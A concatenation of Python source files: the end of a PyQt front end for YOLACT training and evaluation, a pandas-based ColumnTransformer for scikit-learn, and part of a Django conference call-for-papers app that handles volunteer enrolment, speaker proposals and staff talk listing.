QTimer.singleShot(2000, loop.quit)
def resetWindow(self):
self.ui.textBrowser_terminal.clear()
self.clearWindow()
def clearWindow(self):
self.ui.display.clear()
self.validationFile = str()
self.validationModel = str()
self.onlineFile = str()
self.onlineModel = str()
self.validationModel = str()
self.benchmarkModel = str()
self.ui.pushButton_selectModel.setText('Select model')
self.ui.pushButton_selectImage.setText('Select image')
self.ui.pushButton_onlineVideo.setText('Select video')
self.ui.pushButton_onlineModel.setText('Select model')
self.ui.pushButton_evaluate.setEnabled(False)
self.ui.pushButton_onlineTest.setEnabled(False)
self.ui.horizontalSlider_scoreThreshold.setValue(15)
self.ui.lineEdit_scoreThreshold.setText('0.15')
self.ui.lineEdit_onlineThreshold.setText('0.15')
self.ui.lineEdit_camIndex.setText('0')
self.ui.radioButton_batchEvaluation.setChecked(False)
self.ui.pushButton_selectModel_2.setText('Select model')
self.benchmarkNumImage = 1000
self.ui.pushButton_benchmark.setEnabled(False)
self.ui.lineEdit_numImage.setText('1000')
self.ui.horizontalSlider_numImage.setValue(1000)
self.trainConfig = 'yolact_base_config'
self.batchSize = '1'
self.ui.lineEdit_batchSize.setText('1')
self.ui.lineEdit_trainConfig.setText('yolact_base_config')
# delete tmp result
curr_path = os.getcwd()
delete_file = curr_path + '/results/tmp_res.jpg'
if os.path.exists(delete_file):
os.remove(delete_file)
def clearTerminal(self):
self.ui.textBrowser_terminal.clear()
def lineEditMoveSlider(self):
value = self.ui.lineEdit_scoreThreshold.text()
value = float(value)
if value < 0:
value = 0
if value > 0.99:
value = 0.99
value = format(value, '.2f')
self.ui.lineEdit_scoreThreshold.setText(value)
self.ui.horizontalSlider_scoreThreshold.setValue(float(value) * 100)
self.validationScoreThreshold = float(value)
def lineEditMoveSliderBenchmark(self):
value = self.ui.lineEdit_numImage.text()
value = int(value)
if value < 100:
value = 100
if value > 10000:
value = 10000
self.ui.lineEdit_numImage.setText(str(value))
self.ui.horizontalSlider_numImage.setValue(value)
self.benchmarkNumImage = int(value)
def sliderEditLineEdit(self):
value = self.ui.horizontalSlider_scoreThreshold.value() / 100
self.validationScoreThreshold = value
value = format(value, '.2f')
self.ui.lineEdit_scoreThreshold.setText(value)
def sliderEditLineEditBenchmark(self):
value = self.ui.horizontalSlider_numImage.value()
self.benchmarkNumImage = value
self.ui.lineEdit_numImage.setText(str(value))
def onlineThresholdLimit(self):
value = self.ui.lineEdit_onlineThreshold.text()
value = float(value)
value = format(value, '.2f')
value = float(value)
if value < 0:
value = 0
if value > 0.99:
value = 0.99
self.ui.lineEdit_onlineThreshold.setText(str(value))
class TrainingThread(QThread):
signalForText = pyqtSignal(str)
def __init__(self, config=None, batch_size=None, data=None, parent=None):
super(TrainingThread, self).__init__(parent)
self.data = data
self.config = config
self.batch_size = batch_size
def write(self, text):
self.signalForText.emit(str(text))
def run(self):
train_script.parse_args(['--config=' + self.config, '--batch_size=' + self.batch_size])
train_script.perform()
class BenchmarkThread(QThread):
signalForText = pyqtSignal(str)
def __init__(self, model=None, num=1000, data=None, parent=None):
super(BenchmarkThread, self).__init__(parent)
self.data = data
self.model = model
self.num = num
def write(self, text):
self.signalForText.emit(str(text))
def run(self):
eval_script.parse_args(['--trained_model=' + self.model, '--benchmark', '--max_images=' + str(self.num)])
eval_script.perform()
class EvaluationThread(QThread):
signalForText = pyqtSignal(str)
def __init__(self, data=None, parent=None):
super(EvaluationThread, self).__init__(parent)
self.data = data
def write(self, text):
self.signalForText.emit(str(text))
def run(self):
if eval_script.args.video is None:
eval_script.perform()
eval_script.perform()
class DisplayThread(QThread):
signalForDisplay = pyqtSignal(str)
def __int__(self):
super(DisplayThread, self).__init__()
def run(self):
while True:
self.signalForDisplay.emit('')
time.sleep(0.33)
if __name__ == '__main__':
myapp = QApplication(sys.argv)
myDlg = MainDialog()
myDlg.show()
sys.exit(myapp.exec_()) |
<filename>pipeline/_column_transformer.py
import pandas as pd
import numpy as np
from sklearn.utils.metaestimators import _BaseComposition
from sklearn.base import TransformerMixin, clone
from sklearn.pipeline import _name_estimators
from ..preprocessing import Identity, ColumnSelector
__all__ = ['ColumnTransformer', 'make_column_transformer']
class ColumnTransformer(_BaseComposition, TransformerMixin):
'''Applies transformers to columns of an array or pandas DataFrame.
This estimator allows different columns or column subsets of the input
to be transformed separately and the features generated by each transformer
will be concatenated to form a single feature space. This is useful for
combining several feature extraction mechanisms or transformations
into a single transformer.
Parameters
----------
transformer_list : list
List of (string, transformer, columns) tuples (implementing fit/transform).
remainder : {'drop', 'pass'} or estimator, default 'drop'
By default, only the specified columns in `transformer_list` are
transformed and combined in the output, and the non-specified
columns are dropped. (default of ``'drop'``).
By specifying ``remainder='pass'``, all remaining columns that
were not specified in `transformer_list` will be automatically passed
through. This subset of columns is concatenated with the output of
the transformers.
By setting ``remainder`` to be an estimator, the remaining
non-specified columns will use the ``remainder`` estimator. The
estimator must support `fit` and `transform`.
Attributes
----------
transformers_ : list
The collection of fitted transformers as tuples of (name, fitted_transformer,
column). fitted_transformer can be an estimator, ‘drop’, or ‘pass’.
In case there were no columns selected, this will be the unfitted transformer.
If there are remaining columns, the final element is a tuple of the form:
(‘remainder’, transformer, remaining_columns_) corresponding to the remainder
parameter. If there are remaining columns, then
len(transformers_)==len(transformers)+1, otherwise
len(transformers_)==len(transformers).
named_transformers_ : Bunch object, a dictionary with attribute access
Access the fitted transformer by name.
remaining_columns_ : list of strings
List of remining columns.
'''
def __init__(self, transformer_list, remainder='drop', **kwargs):
self.transformer_list = transformer_list
self.remainder = remainder
@property
def _transformers(self):
"""
Internal list of transformer only containing the name and
transformers, dropping the columns. This is for the implementation
of get_params via BaseComposition._get_params which expects lists
of tuples of len 2.
"""
return [(name, trans) for name, trans, _ in self.transformer_list]
def fit(self, X, y=None):
"""Fit all transformers using X.
Parameters
----------
X : DataFrame of shape [n_samples, n_features]
Input data, of which specified subsets are used to fit the transformers.
y : array-like, shape (n_samples, ...), optional
Targets for supervised learning.
Returns
-------
self : ColumnTransformer
This estimator
"""
self.transformers_ = []
self.named_transformers_ = {}
self.remaining_columns_ = set(X.columns)
for name, transformer, cols in self.transformer_list:
# Clone & fit
fitted_transformer = clone(transformer).fit(X[cols], y)
self.named_transformers_[name] = fitted_transformer
# Access by key
fitted_tuple = (name, fitted_transformer, cols)
self.transformers_.append(fitted_tuple)
# Remainin columns
self.remaining_columns_ -= set(cols)
self.remaining_columns_ = list(self.remaining_columns_)
if self.remaining_columns_:
name, cols = 'remainder', self.remaining_columns_
if hasattr(self.remainder, 'fit') and hasattr(self.remainder, 'transform'):
fitted_transformer = clone(self.remainder).fit(X[cols], y)
elif self.remainder is 'pass':
fitted_transformer = Identity().fit(X[cols], y)
elif self.remainder is 'drop':
fitted_transformer = ColumnSelector(cols=[]).fit(X[cols], y)
else:
raise ValueError('Unknown type for remainder. Must be "drop", "pass" or estimator.')
fitted_tuple = (name, fitted_transformer, cols)
self.transformers_.append(fitted_tuple)
return self
def transform(self, X):
"""Transform X separately by each transformer, concatenate results.
Parameters
----------
X : DataFrame of shape [n_samples, n_features]
Input data, of which specified subsets are used to fit the transformers.
Returns
-------
Xt : DataFrame, shape (n_samples, sum_n_components)
hstack of results of transformers. sum_n_components is the
sum of n_components (output dimension) over transformers.
"""
Xt_list = []
for name, transformer, cols in self.transformers_:
Xt_list.append(transformer.transform(X[cols]))
Xt = pd.concat(Xt_list, axis=1)
return Xt
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and
contained subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
return self._get_params('_transformers', deep=deep)
def set_params(self, **kwargs):
"""Set the parameters of this estimator.
Valid parameter keys can be listed with ``get_params()``.
Returns
-------
self
"""
self._set_params('_transformers', **kwargs)
return self
def _get_transformer_list(estimators):
"""
Construct (name, trans, column) tuples from list
"""
message = ('`make_column_transformer` expects (transformer, columns)')
transformers, columns = zip(*estimators)
names, _ = zip(*_name_estimators(transformers))
transformer_list = list(zip(names, transformers, columns))
return transformer_list
def make_column_transformer(*transformers, **kwargs):
"""Construct a ColumnTransformer from the given transformers.
This is a shorthand for the ColumnTransformer constructor; it does not
require, and does not permit, naming the transformers. Instead, they will
be given names automatically based on their types. It also does not allow
weighting with ``transformer_weights``.
Parameters
----------
*transformers : tuples of transformers and column selections
remainder : {'drop', 'pass'} or estimator, default 'drop'
By default, only the specified columns in `transformers` are
transformed and combined in the output, and the non-specified
columns are dropped. (default of ``'drop'``).
By specifying ``remainder='pass'``, all remaining columns that
were not specified in `transformers` will be automatically passed
through. This subset of columns is concatenated with the output of
the transformers.
By setting ``remainder`` to be an estimator, the remaining
non-specified columns will use the ``remainder`` estimator. The
estimator must support `fit` and `transform`.
sparse_threshold : float, default = 0.3
If the transformed output consists of a mix of sparse and dense data,
it will be stacked as a sparse matrix if the density is lower than this
value. Use ``sparse_threshold=0`` to always return dense.
When the transformed output consists of all sparse or all dense data,
the stacked result will be sparse or dense, respectively, and this
keyword will be ignored.
n_jobs : int or None, optional (default=None)
Number of jobs to run in parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Returns
-------
ct : ColumnTransformer
"""
# transformer_weights keyword is not passed through because the user
# would need to know the automatically generated names of the transformers
n_jobs = kwargs.pop('n_jobs', None)
remainder = kwargs.pop('remainder', 'drop')
sparse_threshold = kwargs.pop('sparse_threshold', 0.3)
if kwargs:
raise TypeError('Unknown keyword arguments: "{}"'.format(list(kwargs.keys())[0]))
transformer_list = _get_transformer_list(transformers)
return ColumnTransformer(transformer_list, n_jobs=n_jobs, remainder=remainder,
sparse_threshold=sparse_threshold)
|
from django.core.mail import send_mail
from django.shortcuts import get_object_or_404, redirect, render
from django.template.loader import render_to_string
from django.urls import reverse, reverse_lazy
from django.utils.translation import ugettext_lazy as _
from django.views.generic import DeleteView, FormView, TemplateView
from django.contrib import messages
from django.db.models import Q, Count, Sum
from django.views.generic import CreateView, DetailView, ListView, UpdateView
from django.http import HttpResponse, Http404, HttpResponseServerError
from django.utils import timezone
from django.core.exceptions import PermissionDenied
from django.core.mail import send_mail
from django.forms import modelform_factory
from django import forms
from django.views.decorators.http import require_http_methods
from django.core.cache import cache
from django_select2.views import AutoResponseView
from functools import reduce
import csv
from mailing.forms import MessageForm
from mailing.utils import send_message
from .planning import Program
from .decorators import speaker_required, volunteer_required, staff_required
from .mixins import StaffRequiredMixin, OnSiteMixin, OnSiteFormMixin
from .utils import is_staff
from .models import Participant, Talk, TalkCategory, Vote, Track, Tag, Room, Volunteer, Activity
from .emails import talk_email_send, talk_email_render_preview, \
speaker_email_send, speaker_email_render_preview, \
volunteer_email_send, volunteer_email_render_preview
from .forms import TalkForm, TalkStaffForm, TalkFilterForm, get_talk_speaker_form_class, \
TalkActionForm, SpeakerActionForm, VolunteerActionForm, \
ParticipantForm, ParticipantFilterForm, NotifyForm, \
ConferenceForm, HomepageForm, CreateUserForm, TrackForm, RoomForm, \
VolunteerForm, VolunteerFilterForm, EmailForm, \
PreviewTalkMailForm, PreviewSpeakerMailForm, PreviewVolunteerMailForm, \
SendTalkMailForm, SendSpeakerMailForm, SendVolunteerMailForm, \
TagForm, TalkCategoryForm, ActivityForm, \
ACCEPTATION_VALUES, CONFIRMATION_VALUES
def home(request):
if request.conference.home:
return render(request, 'cfp/home.html')
else:
return redirect(reverse('proposal-home'))
def volunteer_enrole(request):
if request.user.is_authenticated and Volunteer.objects.filter(site=request.conference.site, email=request.user.email).exists():
return redirect(reverse('volunteer-dashboard'))
if not request.conference.volunteers_enrollment_is_open():
raise PermissionDenied
initial = {}
if request.user.is_authenticated and not request.POST:
initial.update({
'name': request.user.get_full_name(),
'phone_number': request.user.profile.phone_number,
'sms_prefered': request.user.profile.sms_prefered,
})
form = VolunteerForm(request.POST or None, initial=initial, conference=request.conference)
if request.user.is_authenticated:
form.fields.pop('email')
if request.method == 'POST' and form.is_valid():
volunteer = form.save(commit=False)
volunteer.language = request.LANGUAGE_CODE
if request.user.is_authenticated:
volunteer.email = request.user.email
volunteer.save()
form.save_m2m()
body = _("""Hi {},
Thank your for your help in the organization of the conference {}!
You can update your availability at anytime:
{}
Thanks!
{}
""").format(volunteer.name, request.conference.name, volunteer.get_secret_url(full=True), request.conference.name)
send_message(
thread=volunteer.conversation,
author=request.conference,
subject=_('[%(conference)s] Thank you for your help!') % {'conference': request.conference},
content=body,
)
messages.success(request, _('Thank you for your participation! You can now subscribe to some activities.'))
return redirect(reverse('volunteer-dashboard', kwargs={'volunteer_token': volunteer.token}))
return render(request, 'cfp/volunteer_enrole.html', {
'activities': Activity.objects.filter(site=request.conference.site),
'form': form,
})
def volunteer_mail_token(request):
form = EmailForm(request.POST or None)
if request.method == 'POST' and form.is_valid():
try:
volunteer = Volunteer.objects.get(site=request.conference.site, email=form.cleaned_data['email'])
except Volunteer.DoesNotExist:
messages.error(request, _('Sorry, we do not know this email.'))
else:
base_url = ('https' if request.is_secure() else 'http') + '://' + request.conference.site.domain
url = base_url + reverse('volunteer-dashboard', kwargs=dict(volunteer_token=volunteer.token))
body = render_to_string('cfp/mails/volunteer_send_token.txt', {
'volunteer': volunteer,
'url': url,
'conf': request.conference
})
send_message(
thread=volunteer.conversation,
author=request.conference,
subject=_("[%(conference)s] Someone asked to access your profil") % {'conference': request.conference},
content=body,
)
messages.success(request, _('A email have been sent with a link to access to your profil.'))
return redirect(reverse('volunteer-mail-token'))
return render(request, 'cfp/volunteer_mail_token.html', {
'form': form,
})
@volunteer_required
def volunteer_dashboard(request, volunteer):
return render(request, 'cfp/volunteer_dashboard.html', {
'activities': Activity.objects.filter(site=request.conference.site),
'volunteer': volunteer,
})
@volunteer_required
def volunteer_profile(request, volunteer):
form = VolunteerForm(request.POST or None, instance=volunteer, conference=request.conference)
if request.method == 'POST' and form.is_valid():
form.save()
messages.success(request, _('Changes saved.'))
return redirect(reverse('volunteer-dashboard', kwargs={'volunteer_token': volunteer.token}))
return render(request, 'cfp/volunteer_profile.html', {
'volunteer': volunteer,
'form': form,
})
@volunteer_required
def volunteer_update_activity(request, volunteer, activity, join):
activity = get_object_or_404(Activity, slug=activity, site=request.conference.site)
if join:
volunteer.activities.add(activity)
messages.success(request, _('Thank you for your participation!'))
else:
volunteer.activities.remove(activity)
messages.success(request, _('Okay, no problem!'))
return redirect(reverse('volunteer-dashboard', kwargs=dict(volunteer_token=volunteer.token)))
@staff_required
def volunteer_list(request):
site = request.conference.site
filter_form = VolunteerFilterForm(request.GET or None, site=site)
# Filtering
show_filters = False
volunteers = Volunteer.objects.filter(site=site).order_by('pk').distinct().prefetch_related('activities')
if filter_form.is_valid():
data = filter_form.cleaned_data
if len(data['activity']):
show_filters = True
q = Q()
if 'none' in data['activity']:
data['activity'].remove('none')
q |= Q(activities__isnull=True)
if len(data['activity']):
q |= Q(activities__slug__in=data['activity'])
volunteers = volunteers.filter(q)
# Action
action_form = VolunteerActionForm(request.POST or None, volunteers=volunteers)
if request.method == 'POST' and action_form.is_valid():
data = action_form.cleaned_data
if data['email']:
request.session['volunteer-email-list'] = data['volunteers']
return redirect(reverse('volunteer-email'))
return redirect(request.get_full_path())
if request.GET.get('format') == 'csv':
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="volunteers.csv"'
writer = csv.writer(response)
for volunteer in volunteers:
writer.writerow(volunteer.get_csv_row())
return response
else:
contact_link = 'mailto:' + ','.join([volunteer.email for volunteer in volunteers.all()])
csv_query_dict = request.GET.copy()
csv_query_dict['format'] = 'csv'
csv_link = '?' + csv_query_dict.urlencode()
return render(request, 'cfp/staff/volunteer_list.html', {
'volunteer_list': volunteers,
'filter_form': filter_form,
'action_form': action_form,
'show_filters': show_filters,
'contact_link': contact_link,
'csv_link': csv_link,
'pending_email': bool(request.session.get('volunteer-email-list', None)),
})
@staff_required
def volunteer_details(request, volunteer_id):
volunteer = get_object_or_404(Volunteer, site=request.conference.site, pk=volunteer_id)
message_form = MessageForm(request.POST or None)
if request.method == 'POST' and message_form.is_valid():
in_reply_to = volunteer.conversation.message_set.last()
send_message(
thread=volunteer.conversation,
author=request.user,
subject='',
content=message_form.cleaned_data['content'],
in_reply_to=in_reply_to,
)
messages.success(request, _('Message sent!'))
return redirect(reverse('volunteer-details', args=[volunteer.pk]))
return render(request, 'cfp/staff/volunteer_details.html', {
'volunteer': volunteer,
})
@staff_required
def volunteer_email(request):
volunteers = Volunteer.objects.filter(pk__in=request.session.get('volunteer-email-list', []))
if not volunteers.exists():
messages.error(request, _('Please select some volunteers.'))
return redirect('volunteer-list')
form = SendVolunteerMailForm(request.POST or None, initial=request.session.get('volunteer-email-stored'), volunteers=volunteers)
if request.method == 'POST' and form.is_valid():
subject = form.cleaned_data['subject']
body = form.cleaned_data['body']
request.session['volunteer-email-stored'] = {'subject': subject, 'body': body}
if form.cleaned_data['confirm']:
sent = volunteer_email_send(volunteers, subject, body)
messages.success(request, _('%(count)d mails have been sent.') % {'count': sent})
del request.session['volunteer-email-list']
return redirect('volunteer-list')
else:
messages.info(request, _('Your ready to send %(count)d emails.') % {'count': volunteers.count()})
else:
form.fields.pop('confirm')
return render(request, 'cfp/staff/volunteer_email.html', {
'volunteers': volunteers,
'form': form,
})
@require_http_methods(['POST'])
@staff_required
def volunteer_email_preview(request):
form = PreviewVolunteerMailForm(request.POST or None)
if not form.is_valid():
return HttpResponseServerError()
volunteer = get_object_or_404(Volunteer, site=request.conference.site, pk=form.cleaned_data['volunteer'])
preview = volunteer_email_render_preview(volunteer, form.cleaned_data['subject'], form.cleaned_data['body'])
return HttpResponse(preview)
def proposal_home(request):
categories = request.conference.opened_categories
if not categories.exists():
return render(request, 'cfp/closed.html')
initial = {}
fields = ['name', 'email', 'biography']
if request.user.is_authenticated:
if Participant.objects.filter(site=request.conference.site, email=request.user.email).exists():
return redirect(reverse('proposal-dashboard'))
elif not request.POST:
initial.update({
'name': request.user.get_full_name(),
'biography': request.user.profile.biography,
})
fields.remove('email')
NewSpeakerForm = modelform_factory(Participant, form=ParticipantForm, fields=fields)
speaker_form = NewSpeakerForm(request.POST or None, initial=initial, conference=request.conference)
talk_form = TalkForm(request.POST or None, categories=categories)
if request.method == 'POST' and all(map(lambda f: f.is_valid(), [speaker_form, talk_form])):
speaker = speaker_form.save(commit=False)
speaker.site = request.conference.site
if request.user.is_authenticated:
speaker.email = request.user.email
speaker.save()
talk = talk_form.save(commit=False)
talk.site = request.conference.site
talk.save()
talk.speakers.add(speaker)
base_url = ('https' if request.is_secure() else 'http') + '://' + request.conference.site.domain
url_dashboard = base_url + reverse('proposal-dashboard', kwargs=dict(speaker_token=speaker.token))
url_talk_details = base_url + reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk))
url_speaker_add = base_url + reverse('proposal-speaker-add', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk))
body = _("""Hi {},
Your talk has been submitted for {}.
Here are the details of your talk:
Title: {}
Description: {}
You can at anytime:
- review and edit your profile: {}
- review and edit your talk: {}
- add a new co-speaker: {}
If you have any question, your can answer to this email.
Thanks!
{}
""").format(
speaker.name, request.conference.name, talk.title, talk.description,
url_dashboard, url_talk_details, url_speaker_add,
request.conference.name,
)
send_message(
thread=speaker.conversation,
author=request.conference,
subject=_("[%(conference)s] Thank you for your proposition '%(talk)s'") % {
'conference': request.conference.name,
'talk': talk,
},
content=body,
)
messages.success(request, _('You proposition have been successfully submitted!'))
return redirect(reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk)))
return render(request, 'cfp/proposal_home.html', {
'speaker_form': speaker_form,
'talk_form': talk_form,
})
def proposal_mail_token(request):
form = EmailForm(request.POST or None)
if request.method == 'POST' and form.is_valid():
try:
speaker = Participant.objects.get(site=request.conference.site, email=form.cleaned_data['email'])
except Participant.DoesNotExist:
messages.error(request, _('Sorry, we do not know this email.'))
else:
base_url = ('https' if request.is_secure() else 'http') + '://' + request.conference.site.domain
dashboard_url = base_url + reverse('proposal-dashboard', kwargs=dict(speaker_token=speaker.token))
body = _("""Hi {},
Someone, probably you, asked to access your profile.
You can edit your talks or add new ones following this url:
{}
If you have any question, your can answer to this email.
Sincerely,
{}
""").format(speaker.name, dashboard_url, request.conference.name)
send_message(
thread=speaker.conversation,
author=request.conference,
subject=_("[%(conference)s] Someone asked to access your profil") % {
'conference': request.conference.name,
},
content=body,
)
messages.success(request, _('A email have been sent with a link to access to your profil.'))
return redirect(reverse('proposal-mail-token'))
return render(request, 'cfp/proposal_mail_token.html', {
'form': form,
})
@speaker_required
def proposal_dashboard(request, speaker):
return render(request, 'cfp/proposal_dashboard.html', {
'speaker': speaker,
'talks': speaker.talk_set.all(),
})
@speaker_required
def proposal_talk_details(request, speaker, talk_id):
talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
return render(request, 'cfp/proposal_talk_details.html', {
'speaker': speaker,
'talk': talk,
})
@speaker_required
def proposal_talk_edit(request, speaker, talk_id=None):
if talk_id:
talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
else:
talk = None
categories = request.conference.opened_categories
form = TalkForm(request.POST or None, request.FILES or None, categories=categories, instance=talk)
if request.method == 'POST' and form.is_valid():
talk = form.save(commit=False)
talk.site = request.conference.site
talk.save()
talk.speakers.add(speaker)
if talk_id:
messages.success(request, _('Changes saved.'))
else:
# TODO: it could be great to receive the proposition by mail
# but this is not crucial as the speaker already have a link in its mailbox
messages.success(request, _('You proposition have been successfully submitted!'))
return redirect(reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk)))
return render(request, 'cfp/proposal_talk_form.html', {
'speaker': speaker,
'talk': talk,
'form': form,
})
@speaker_required
def proposal_talk_acknowledgment(request, speaker, talk_id, confirm):
# TODO: handle multiple speakers case
talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
if not request.conference.disclosed_acceptances or not talk.accepted or request.conference.completed:
raise PermissionDenied
if talk.confirmed == confirm:
if confirm:
messages.warning(request, _('You already confirmed your participation to this talk.'))
else:
messages.warning(request, _('You already cancelled your participation to this talk.'))
else:
talk.confirmed = confirm
talk.save()
if confirm:
confirmation_message= _('Your participation has been taken into account, thank you!')
action = _('confirmed')
else:
confirmation_message = _('We have noted your unavailability.')
action = _('cancelled')
content = _('Speaker %(speaker)s %(action)s his/her participation for %(talk)s.') % {
'speaker': speaker,
'action': action,
'talk': talk,
}
send_message(
thread=talk.conversation,
author=speaker,
subject=_('[%(conference)s] %(speaker)s %(action)s his/her participation') % {
'conference': request.conference,
'speaker': speaker,
'action': action,
},
content=content,
)
messages.success(request, confirmation_message)
return redirect(reverse('proposal-talk-details', kwargs={'speaker_token': speaker.token, 'talk_id': talk.pk}))
# FIXME his this view really useful?
#@speaker_required
#def proposal_speaker_details(request, speaker, talk_id, co_speaker_id):
# talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
# co_speaker = get_object_or_404(Participant, site=request.conference.site, talk_set__pk=talk.pk, pk=co_speaker_id)
# return render(request, 'cfp/proposal_speaker_details.html', {
# 'speaker': speaker,
# 'talk': talk,
# 'co_speaker': co_speaker,
# })
@speaker_required
def proposal_speaker_edit(request, speaker, talk_id=None, co_speaker_id=None):
talk, co_speaker, co_speaker_candidates = None, None, None
if talk_id:
talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
if co_speaker_id:
co_speaker = get_object_or_404(Participant, site=request.conference.site, talk__pk=talk.pk, pk=co_speaker_id)
else:
co_speaker_candidates = speaker.co_speaker_set.exclude(pk__in=talk.speakers.values_list('pk'))
EditSpeakerForm = modelform_factory(Participant, form=ParticipantForm, fields=['name', 'email', 'biography'] + ParticipantForm.SOCIAL_FIELDS)
all_forms = []
speaker_form = EditSpeakerForm(request.POST or None, conference=request.conference, instance=co_speaker if talk else speaker)
all_forms.append(speaker_form)
if talk and not co_speaker_id:
notify_form = NotifyForm(request.POST or None)
all_forms.append(notify_form)
else:
notify_form = None
if request.method == 'POST' and all(map(lambda f: f.is_valid(), all_forms)):
edited_speaker = speaker_form.save()
if talk:
talk.speakers.add(edited_speaker)
if co_speaker_id:
messages.success(request, _('Changes saved.'))
else:
if notify_form.cleaned_data['notify']:
base_url = ('https' if request.is_secure() else 'http') + '://' + request.conference.site.domain
url_dashboard = base_url + reverse('proposal-dashboard', kwargs=dict(speaker_token=edited_speaker.token))
url_talk_details = base_url + reverse('proposal-talk-details', kwargs=dict(speaker_token=edited_speaker.token, talk_id=talk.pk))
url_speaker_add = base_url + reverse('proposal-speaker-add', kwargs=dict(speaker_token=edited_speaker.token, talk_id=talk.pk))
body = _("""Hi {},
{} add you as a co-speaker for the conference {}.
Here is a summary of the talk:
Title: {}
Description: {}
You can at anytime:
- review and edit your profile: {}
- review and edit the talk: {}
- add another co-speaker: {}
If you have any question, your can answer to this email.
Thanks!
{}
""").format(
edited_speaker.name, speaker.name, request.conference.name,
talk.title, talk.description,
url_dashboard, url_talk_details, url_speaker_add,
request.conference.name,
)
send_message(
thread=edited_speaker.conversation,
author=request.conference,
subject=_("[%(conference)s] You have been added as co-speaker to '%(talk)s'") % {
'conference': request.conference,
'talk': talk,
},
content=body,
)
messages.success(request, _('Co-speaker successfully added to the talk.'))
#return redirect(reverse('proposal-speaker-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk)))
return redirect(reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk.pk)))
else:
return redirect(reverse('proposal-dashboard', kwargs=dict(speaker_token=speaker.token)))
return render(request, 'cfp/proposal_speaker_form.html', {
'speaker': speaker,
'talk': talk,
'co_speaker': co_speaker,
'co_speaker_candidates': co_speaker_candidates,
'speaker_form': speaker_form,
'notify_form': notify_form,
})
@speaker_required
def proposal_speaker_add(request, speaker, talk_id, speaker_id):
talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
co_speaker = get_object_or_404(Participant, pk__in=speaker.co_speaker_set.values_list('pk'), pk=speaker_id)
talk.speakers.add(co_speaker)
messages.success(request, _('Co-speaker successfully added to the talk.'))
return redirect(reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk_id)))
# TODO: ask for confirmation (with POST request needed)
@speaker_required
def proposal_speaker_remove(request, speaker, talk_id, co_speaker_id):
talk = get_object_or_404(Talk, site=request.conference.site, speakers__pk=speaker.pk, pk=talk_id)
co_speaker = get_object_or_404(Participant, site=request.conference.site, talk__pk=talk.pk, pk=co_speaker_id)
# prevent speaker from removing his/her self
if co_speaker.pk == speaker.pk:
raise PermissionDenied
talk.speakers.remove(co_speaker)
messages.success(request, _('Co-speaker successfully removed from the talk.'))
return redirect(reverse('proposal-talk-details', kwargs=dict(speaker_token=speaker.token, talk_id=talk_id)))
@staff_required
def talk_acknowledgment(request, talk_id, confirm):
talk = get_object_or_404(Talk, pk=talk_id, site=request.conference.site)
if talk.accepted is not True or talk.confirmed == confirm:
raise PermissionDenied
# TODO: handle multiple speakers case
talk.confirmed = confirm
talk.save()
if confirm:
confirmation_message= _('The speaker confirmation have been noted.')
action = _('confirmed')
thread_note = _('The talk have been confirmed.')
else:
confirmation_message = _('The speaker unavailability have been noted.')
action = _('cancelled')
thread_note = _('The talk have been %(action)s.') % {'action': action}
send_message(
thread=talk.conversation,
author=request.user,
subject=_("[%(conference)s] The talk '%(talk)s' have been %(action)s.") % {
'conference': request.conference,
'talk': talk,
'action': action,
},
content=thread_note,
)
messages.success(request, confirmation_message)
return redirect(reverse('talk-details', kwargs=dict(talk_id=talk_id)))
@staff_required
def staff(request):
return render(request, 'cfp/staff/base.html')
@staff_required
def admin(request):
return render(request, 'cfp/admin/base.html')
@staff_required
def talk_list(request):
talks = Talk.objects.filter(site=request.conference.site)
# Filtering
show_filters = False
filter_form = TalkFilterForm(request.GET or None, site=request.conference.site)
if filter_form.is_valid():
data = filter_form.cleaned_data
if len(data['category']):
show_filters = True
talks = talks.filter(reduce(lambda x, y: x | y, [Q(category__pk=pk) for pk in data['category']]))
if len(data['accepted']):
show_filters = True
talks = talks.filter(reduce(lambda x, y: x | y, [Q(accepted=dict(ACCEPTATION_VALUES)[status]) for status in data['accepted']]))
if len(data['confirmed']):
show_filters = True
talks = talks.filter(accepted=True)
talks = talks.filter(reduce(lambda x, y: x | y, [Q(confirmed=dict(CONFIRMATION_VALUES)[status]) for status in data['confirmed']]))
if data['room'] != None:
show_filters = True
talks = talks.filter(room__isnull=not data['room'])
if data['scheduled'] != None:
show_filters = True
talks = talks.filter(start_date__isnull=not data['scheduled'])
if len(data['tag']):
show_filters = True
talks = talks.filter(tags__slug__in=data['tag'])
if len(data['track']):
show_filters = True
q = Q()
if 'none' in data['track']:
data['track'].remove('none')
q |= Q(track__isnull=True)
if len(data['track']):
q |= Q(track__slug__in=data['track'])
talks = talks.filter(q)
if data['vote'] != None:
show_filters = True
if data['vote']:
talks = talks.filter(vote__user=request.user)
else:
talks = talks.exclude(vote__user=request.user)
if data['materials'] != None:
show_filters = True
materials_filter = Q(materials__isnull=False) & ~Q(materials__exact='')
if data['materials']:
talks = talks.filter(materials_filter)
else:
talks = talks.filter(~materials_filter)
if data['video'] != None:
show_filters = True
if data['video']:
talks = talks.exclude(video__exact='')
else:
talks = talks.filter(video__exact='')
talks = talks.prefetch_related('category', 'speakers', 'track', 'tags')
if request.GET.get('format') == 'csv':
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="talks.csv"'
